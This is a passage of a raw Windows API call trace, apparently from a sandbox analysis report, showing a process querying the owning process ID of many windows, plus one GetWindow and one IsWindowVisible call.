	[0515.823] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xdc8
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xc18
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xc2c
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa1c
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1244
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xdb0
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1398
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1358
	[0515.823] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1370
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1340
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x130c
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x12c0
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x12e4
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1270
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1298
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x120c
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x122c
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x11c4
	[0515.824] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x11b0
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1188
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1148
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1160
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10fc
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe34
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xea4
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x514
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe48
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xbc8
	[0515.825] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xdf8
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x318
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xcac
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x8bc
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xf9c
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xf48
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe40
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xecc
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xeb8
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe80
	[0515.826] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe98
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe60
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xee4
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xf00
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xdf0
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe1c
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xdd0
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xd94
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xd74
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xd00
	[0515.827] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xcd8
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xc84
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xca4
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xc64
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xc24
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xb84
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xbac
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x384
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xab8
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x33c
	[0515.828] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa44
	[0515.829] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa64
	[0515.829] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x8a8
	[0515.829] GetWindow (hWnd=0x102c8, uCmd=0x4) returned 0x0
	[0515.830] IsWindowVisible (hWnd=0x102c8) returned 0
	[0515.830] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xaf0
	[0515.830] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x88c
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xb04
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x910
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x230
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xac0
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xab4
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xaac
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x3d0
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x978
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa7c
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x59c
	[0515.831] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa88
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa6c
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa68
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x9f8
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa04
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x924
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x8dc
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x7dc
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x768
	[0515.832] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x764
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x820
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x810
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x794
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x83c
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x7ac
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xb44
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xb5c
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x838
	[0515.833] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x818
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x5b8
	[0515.834] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x494
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1ec
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x440
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x7e8
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x730
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x2c8
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x31c
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x330
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x128
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x5c8
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x6f8
	[0515.835] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x358
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x73c
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xb0
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x250
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x240
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x790
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x61c
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x540
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x538
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x568
	[0515.836] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x538
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x568
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x538
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x540
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x540
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x57c
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x460
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x554
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x528
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.837] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x79c
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4e0
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x460
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x460
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x44c
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x778
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x460
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x558
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x4d0
	[0515.838] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1824
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1088
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1908
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x18cc
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x18d0
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1840
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10c4
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x128c
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x16e8
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x16cc
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x274
	[0515.839] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10e0
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10cc
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10c0
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x10d0
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1198
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1080
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1074
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x106c
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1474
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1414
	[0515.840] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xbd0
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x550
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xa38
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x16d0
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x16d4
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x15bc
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x15a0
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x159c
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1598
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1594
	[0515.841] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1590
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x158c
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1588
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1584
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1580
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x157c
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1488
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1404
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x11b8
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xbd4
	[0515.842] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe0c
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xd30
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe70
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x13b8
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe20
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe2c
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe00
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xe04
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0xc94
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x13b0
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x13ac
	[0515.843] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x13a8
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x1374
	[0515.844] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xcd740 | out: lpdwProcessId=0xcd740) returned 0x132c
